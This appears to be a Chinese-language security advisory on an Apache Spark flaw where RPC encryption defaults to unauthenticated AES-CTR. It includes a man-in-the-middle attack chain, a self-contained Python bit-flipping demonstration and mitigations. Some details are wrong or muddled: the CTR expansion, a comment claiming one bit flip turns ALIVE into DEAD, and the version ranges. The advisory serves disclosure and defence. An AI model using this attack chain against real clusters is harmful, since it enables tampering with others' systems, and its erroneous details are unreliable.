CVE-2025-55039 Apache Spark RPC通信加密认证缺失漏洞

漏洞信息

漏洞编号

CVE-2025-55039

漏洞类型

加密算法不安全配置/中间人攻击

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Spark

漏洞概述

CVE-2025-55039是Apache Spark中存在的一个中等严重性安全漏洞，主要影响Spark节点之间RPC通信的网络加密机制。该漏洞源于Spark在启用网络加密功能时（spark.network.crypto.enabled设置为true），默认使用了AES/CTR/NoPadding加密模式，这是一种仅提供加密而不提供认证的不安全密码模式。

CTR（Cipher Block Chaining Counter）模式属于流密码模式，其加密过程不包含完整性校验机制，攻击者可以在不解密的情况下直接对密文进行比特翻转操作，从而篡改加密内容而不被发现。该漏洞的CVSS评分为6.5分，攻击向量为网络（AV:N），无需认证（PR:N）和用户交互（UI:N），对机密性和完整性存在低危影响，对可用性无影响。

该漏洞由Apache Spark安全团队（[email protected]）发现并报告，于2025年10月15日正式披露。漏洞影响Apache Spark 3.4.4之前、3.5.2之前以及4.0.0之前的所有版本。由于Spark常用于大数据处理和分布式计算环境，该漏洞可能影响大量企业级数据处理流程的完整性和安全性。攻击者可以通过中间人攻击篡改心跳消息或应用数据，影响Spark工作流的完整性。

技术细节

Apache Spark的网络加密模块（org.apache.spark.network.crypto）在节点间RPC通信时提供传输加密功能。当用户启用spark.network.crypto.enabled配置项（默认为false）时，Spark会使用配置的加密算法对RPC流量进行加密。然而，当spark.network.crypto.cipher参数未显式配置时，Spark默认使用AES/CTR/NoPadding加密模式。

AES/CTR/NoPadding是一种流密码模式，其工作原理是将明文与基于密钥生成的密钥流进行XOR运算以产生密文。这种模式的致命缺陷在于：它仅提供机密性保护（confidentiality），不提供完整性保护（integrity）和认证（authentication）。攻击者可以利用CTR模式的特性，在不知道密钥的情况下直接对密文进行比特翻转——即在密文的特定位置翻转比特，解密后会在明文的对应位置产生可预测的比特翻转。

利用方式：攻击者首先需要位于受害者和Spark集群节点之间的网络路径上（即中间人位置）。当捕获到加密的RPC流量后，攻击者可以分析密文结构，识别心跳消息或其他控制消息的格式。由于CTR模式不包含消息认证码（MAC），攻击者可以任意修改密文内容而不被检测到。例如，攻击者可以修改心跳消息中的状态字段，或篡改应用数据中的关键参数，从而影响Spark工作流的执行结果或破坏集群状态一致性。

根本原因在于缺少认证加密（Authenticated Encryption），正确做法是使用AES/GCM/NoPadding模式，该模式同时提供加密和认证（GCM = Galois/Counter Mode），能够检测任何对密文的篡改尝试。

攻击链分析

STEP 1

步骤1：环境准备

攻击者首先确认目标Spark集群已启用网络加密（spark.network.crypto.enabled=true），但未显式配置spark.network.crypto.cipher参数，此时Spark默认使用不安全的AES/CTR/NoPadding模式。

STEP 2

步骤2：网络位置控制

攻击者通过ARP欺骗、DNS劫持或路由劫持等方式，将自身置于Spark集群节点之间的通信路径上，实现中间人（MITM）位置。

STEP 3

步骤3：流量拦截

攻击者拦截Spark节点间的RPC通信流量，包括心跳消息、块传输消息、应用数据传输等。

STEP 4

步骤4：密文分析

由于CTR模式是流密码模式，密文与明文存在直接的XOR关系。攻击者通过分析密文结构和已知的消息格式（如心跳消息格式），确定需要篡改的密文位置。

STEP 5

步骤5：比特翻转攻击

攻击者在密文的特定位置翻转比特。由于CTR模式不包含消息认证码（MAC），接收方解密后无法检测到篡改，导致明文内容被恶意修改。

STEP 6

步骤6：影响Spark工作流

篡改后的消息被正常处理，可能导致心跳状态异常、任务调度错误、数据传输内容被篡改等后果，影响Spark集群的完整性和正常运行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-55039 PoC - AES/CTR/NoPadding Bit-Flipping Attack on Spark RPC
# This PoC demonstrates the vulnerability concept of CTR mode bit-flipping
# without authentication on Spark RPC traffic

from Crypto.Cipher import AES
from Crypto.Util import Counter
import struct

# Simulated Spark RPC message structure
class SparkRPCMessage:
    def __init__(self, msg_type, payload):
        self.msg_type = msg_type  # e.g., Heartbeat, BlockTransfer
        self.payload = payload    # Message data

    def serialize(self):
        # Simplified serialization: type (4 bytes) + payload
        return struct.pack('>I', self.msg_type) + self.payload

# Vulnerable encryption using AES/CTR/NoPadding (Spark's insecure default)
def vulnerable_encrypt(key, plaintext):
    """Simulates Spark's default insecure encryption: AES/CTR/NoPadding"""
    # CTR mode with random IV (nonce)
    nonce = b'\x00' * 8  # Simplified nonce
    ctr = Counter.new(64, prefix=nonce, initial_value=0)
    cipher = AES.new(key, AES.MODE_CTR, counter=ctr)
    ciphertext = cipher.encrypt(plaintext)
    return nonce + ciphertext  # Prepend nonce

def vulnerable_decrypt(key, ciphertext):
    """Decrypts using AES/CTR/NoPadding - no integrity check!"""
    nonce = ciphertext[:8]
    encrypted = ciphertext[8:]
    ctr = Counter.new(64, prefix=nonce, initial_value=0)
    cipher = AES.new(key, AES.MODE_CTR, counter=ctr)
    plaintext = cipher.decrypt(encrypted)
    return plaintext

# Secure alternative using AES/GCM/NoPadding
def secure_encrypt(key, plaintext, associated_data=b''):
    """Recommended fix: AES/GCM/NoPadding provides authenticated encryption"""
    cipher = AES.new(key, AES.MODE_GCM)
    ciphertext, tag = cipher.encrypt_and_digest(plaintext)
    return cipher.nonce + ciphertext + tag

def mitm_bit_flip_attack(ciphertext, flip_position, flip_value):
    """
    Demonstrates the MITM attack: flip bits in ciphertext
    Since CTR mode has no authentication, modifications go undetected.
    """
    modified = bytearray(ciphertext)
    modified[flip_position] ^= flip_value
    return bytes(modified)

# Demonstration
if __name__ == "__main__":
    key = b'0123456789abcdef'  # 16-byte AES key

    # Create a legitimate Spark heartbeat message
    heartbeat = SparkRPCMessage(
        msg_type=1,  # HEARTBEAT type
        payload=b"status=ALIVE;timestamp=1234567890;node=worker-01"
    )
    plaintext = heartbeat.serialize()

    print("[*] Original plaintext:", plaintext)

    # Encrypt with vulnerable AES/CTR/NoPadding
    ciphertext = vulnerable_encrypt(key, plaintext)
    print("[*] Encrypted ciphertext (hex):", ciphertext.hex())

    # Attacker intercepts and modifies ciphertext
    # Flip a bit in the status field area to change ALIVE to DEAD
    modified_ct = mitm_bit_flip_attack(ciphertext, 12, 0x01)
    print("[*] Modified ciphertext (hex):", modified_ct.hex())

    # Victim decrypts - NO authentication failure!
    decrypted = vulnerable_decrypt(key, modified_ct)
    print("[*] Decrypted after attack:", decrypted)
    print("[!] Attack successful - message integrity compromised!")

    # Compare with secure GCM mode
    secure_ct = secure_encrypt(key, plaintext)
    print("\n[*] Secure GCM ciphertext (hex):", secure_ct.hex())
    print("[*] GCM mode would detect any tampering via authentication tag")

影响范围

Apache Spark < 3.4.4

Apache Spark 3.5.0 - 3.5.1

Apache Spark 4.0.0 之前版本

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）将spark.network.crypto.cipher显式配置为AES/GCM/NoPadding模式以启用认证加密；2）启用SSL加密（设置spark.ssl.enabled=true）来替代不安全的网络加密；3）在网络层面部署入侵检测系统（IDS）监控异常的RPC流量模式；4）使用网络分段和防火墙限制Spark节点间的直接通信，仅允许通过受信任的网络路径进行通信；5）监控集群中异常的节点状态变化和任务执行结果，及时发现可能的篡改行为。